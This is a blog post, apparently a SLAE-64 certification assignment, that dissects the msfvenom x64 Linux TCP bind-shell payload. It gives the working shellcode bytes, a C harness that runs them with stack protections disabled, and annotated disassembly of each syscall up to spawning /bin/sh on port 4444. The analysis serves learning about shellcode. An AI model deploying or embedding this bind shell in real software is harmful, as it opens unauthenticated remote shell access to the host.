Tags: assembly, slae-64, shellcode
This and two other posts will make up the fifth of seven assignments that will comprise my attempt at the SecurityTube Linux Assembly Expert (SLAE-64) certification. Each post will correspond to seven assignments of varying difficulty. I decided to take SLAE-64 to shore up my knowledge of assembly and shellcoding before diving in to OSCE.
I started out by generating some shellcode samples. For my first selection, I decided to keep it simple by choosing a TCP bind shell, much like my first assignment. I hoped that this decision would point out areas of improvement in my own shellcode from which I could learn.
/*
* msfvenom -p linux/x64/shell_bind_tcp -f c
*
* No platform was selected, choosing Msf::Module::Platform::Linux from the payload
* No Arch selected, selecting Arch: x64 from the payload
* No encoder or badchars specified, outputting raw payload
* Payload size: 86 bytes
* Final size of c file: 386 bytes
*/
unsigned char buf[] =
"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x52"
"\xc7\x04\x24\x02\x00\x11\x5c\x48\x89\xe6\x6a\x10\x5a\x6a\x31"
"\x58\x0f\x05\x6a\x32\x58\x0f\x05\x48\x31\xf6\x6a\x2b\x58\x0f"
"\x05\x48\x97\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75"
"\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00"
"\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05";
The next step is to add the shellcode to a shellcode skeleton used for testing then compile the resulting c code into an executable for analysis.
// gcc -fno-stack-protector -z execstack -o shellcode-skeleton shellcode-skeleton.c
#include <stdio.h>
#include <string.h>
unsigned char code[] = \
"\x6a\x29\x58\x99\x6a\x02\x5f\x6a\x01\x5e\x0f\x05\x48\x97\x52"
"\xc7\x04\x24\x02\x00\x11\x5c\x48\x89\xe6\x6a\x10\x5a\x6a\x31"
"\x58\x0f\x05\x6a\x32\x58\x0f\x05\x48\x31\xf6\x6a\x2b\x58\x0f"
"\x05\x48\x97\x6a\x03\x5e\x48\xff\xce\x6a\x21\x58\x0f\x05\x75"
"\xf6\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68\x00"
"\x53\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05";
int main() {
printf("Shellcode length: %zu\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
The *&code
is pointing to our unsigned char array named code
in the shellcode skeleton we setup in the previous step.
0x0000555555755020 <+0>: push 0x29
0x0000555555755022 <+2>: pop rax
0x0000555555755023 <+3>: cdq
0x0000555555755024 <+4>: push 0x2
0x0000555555755026 <+6>: pop rdi
0x0000555555755027 <+7>: push 0x1
0x0000555555755029 <+9>: pop rsi
0x000055555575502a <+10>: syscall
0x000055555575502c <+12>: xchg rdi,rax
0x000055555575502e <+14>: push rdx
0x000055555575502f <+15>: mov DWORD PTR [rsp],0x5c110002
0x0000555555755036 <+22>: mov rsi,rsp
0x0000555555755039 <+25>: push 0x10
0x000055555575503b <+27>: pop rdx
0x000055555575503c <+28>: push 0x31
0x000055555575503e <+30>: pop rax
0x000055555575503f <+31>: syscall
0x0000555555755041 <+33>: push 0x32
0x0000555555755043 <+35>: pop rax
0x0000555555755044 <+36>: syscall
0x0000555555755046 <+38>: xor rsi,rsi
0x0000555555755049 <+41>: push 0x2b
0x000055555575504b <+43>: pop rax
0x000055555575504c <+44>: syscall
0x000055555575504e <+46>: xchg rdi,rax
0x0000555555755050 <+48>: push 0x3
0x0000555555755052 <+50>: pop rsi
0x0000555555755053 <+51>: dec rsi
0x0000555555755056 <+54>: push 0x21
0x0000555555755058 <+56>: pop rax
0x0000555555755059 <+57>: syscall
0x000055555575505b <+59>: jne 0x555555755053 <code+51>
0x000055555575505d <+61>: push 0x3b
0x000055555575505f <+63>: pop rax
0x0000555555755060 <+64>: cdq
0x0000555555755061 <+65>: movabs rbx,0x68732f6e69622f
0x000055555575506b <+75>: push rbx
0x000055555575506c <+76>: mov rdi,rsp
0x000055555575506f <+79>: push rdx
0x0000555555755070 <+80>: push rdi
0x0000555555755071 <+81>: mov rsi,rsp
0x0000555555755074 <+84>: syscall
0x0000555555755076 <+86>: add BYTE PTR [rax],al
The next breakpoint is set to the socket syscall located at 0x000055555575502a
. There’s nothing really out of the ordinary here. The shellcode and register values are on par with what’s expected from previous looks at a bind shell.
push 0x29
pop rax ; socket syscall number into rax
cdq ; use sign extension to zero out rdx
push 0x2
pop rdi ; value 2 into rdi (AF_INET)
push 0x1
pop rsi ; value 1 into rsi (SOCK_STREAM)
syscall
Noteworthy changes:
The next breakpoint is set to the bind syscall located at 0x000055555575503f
. There’s a few things going on here that we’ll discuss. First, the assumption that rdx is still zero. All the information that I could find states that rdx is a caller-save register, meaning that it’s encumbent upon the caller to save the state of that register across procedure calls (syscalls in this case).
Second, msfvenom doesn’t care if null-bytes are present. If you tell the program that you’re concerned about nulls, it will then encode the shellcode to remove those null-bytes (or any other bad character you’re interested in suppressing). If you don’t specify bad characters, msfvenom just cranks out concise shellcode. It’s kind of refreshing that the mental gymnastics of removing nulls isn’t strictly necessary at all times.
Finally, the shellcode here doesn’t care about zero’ing out the entire 16 bytes needed for the sockaddr_in struct. It zeroes out 8 bytes for the port and family but nothing else. Though, it doesn’t appear to carry any negative consequences.
xchg rdi,rax ; put socket's file descriptor into rdi
push rdx ; push 0x0 onto the stack
mov DWORD PTR [rsp],0x5c110002 ; move the port and AF_INET onto the stack
mov rsi,rsp ; rsi now points to sockaddr_in struct
push 0x10
pop rdx ; value 16 into rdx (length of sockaddr_in)
push 0x31
pop rax ; value 49 into rax (bind syscall #)
syscall
Noteworthy changes:
The next breakpoint is set to the listen syscall located at 0x0000555555755044
. The only surprising thing to me in this section was that msfvenom disregarded the backlog argument to the listen syscall (int listen(int sockfd, int backlog);). The value of rsi at the time of the syscall was a memory address pointing to our sockaddr_in struct that was used during the bind syscall. I take that to mean that 0x5c110002 (1544617986 in decimal) is passed as the backlog integer.
push 0x32
pop rax ; value 50 into rax (listen syscall #)
syscall
Noteworthy changes:
The next breakpoint is set to the listen syscall located at 0x000055555575504c
. Another surprise to me here was that the shellcode generated zeroed out rsi, which is supposed to be a pointer to 16 bytes of space, and makes the call. No other actions taken… The shellcode did make use of rdx already containing the value of 16 from the call to bind.
xor rsi,rsi
push 0x2b
pop rax ; value 43 into rax (accept syscall #)
syscall
Noteworthy changes:
The next breakpoint is set to the dup2 loop’s comparison located at 0x000055555575505b
. As expected, there is a tight loop that handles going from 2 to 0 and calling dup2 until STD{IN,OUT,ERR} are all duplicated.
0x000055555575504e <+46>: xchg rdi,rax ; accept returns client to rax, store it back in rdi
0x0000555555755050 <+48>: push 0x3
0x0000555555755052 <+50>: pop rsi ; loop counter in rsi
0x0000555555755053 <+51>: dec rsi ; 2 -> 1 -> 0
0x0000555555755056 <+54>: push 0x21
0x0000555555755058 <+56>: pop rax ; value 33 into rax (dup2 syscall)
0x0000555555755059 <+57>: syscall
0x000055555575505b <+59>: jne 0x555555755053 <code+51>
Noteworthy changes:
The final breakpoint is set to the execve syscall located at 0x0000555555755074
. The generated execve shellcode aligns closely with what is covered as part of the SLAE-64 course. Nothing too out of the ordinary in this section.
0x000055555575505d <+61>: push 0x3b
0x000055555575505f <+63>: pop rax ; value 59 into rax (execve syscall)
0x0000555555755060 <+64>: cdq ; zero out rdx via sign extension
0x0000555555755061 <+65>: movabs rbx,0x68732f6e69622f
0x000055555575506b <+75>: push rbx ; get /bin/sh on stack
0x000055555575506c <+76>: mov rdi,rsp ; address to /bin/sh in rdi
0x000055555575506f <+79>: push rdx ; push null
0x0000555555755070 <+80>: push rdi ; push addr of /bin/sh
0x0000555555755071 <+81>: mov rsi,rsp ; pointer to addr of /bin/sh in rsi
0x0000555555755074 <+84>: syscall
My main takeaway from this analysis is that reducing the number of opcodes is not the last step to producing small shellcode. The first step should be to write something that works, without any regard to size or bad characters. After that, ways of producing smaller opcodes can be applied. Up until performing this analysis, this is where my process stopped. As a third step, I plan to step through the shellcode again with an eye to where I can make use of existing values in registers to satisfy the requirements of the calls my shellcode is trying to make.
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert
Student ID: E64-1584
My SLAE-64 Assignments Repository